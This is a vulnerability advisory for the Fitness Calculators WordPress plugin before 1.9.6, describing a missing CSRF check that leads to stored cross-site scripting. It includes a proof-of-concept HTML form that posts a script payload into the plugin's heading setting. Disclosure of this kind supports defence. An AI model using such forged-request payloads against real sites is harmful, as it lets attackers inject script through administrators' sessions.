Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS)
Description
The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue
Proof of Concept
<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
<input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
<input type="submit" value="Save" name="submit">
</form> Affects Plugins
Fixed in version 1.9.6✓
References
Classification
Miscellaneous
Original Researcher
0xB9
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-14 (about 3 months ago)
Added
2021-04-14 (about 3 months ago)
Last Updated
2021-04-16 (about 3 months ago)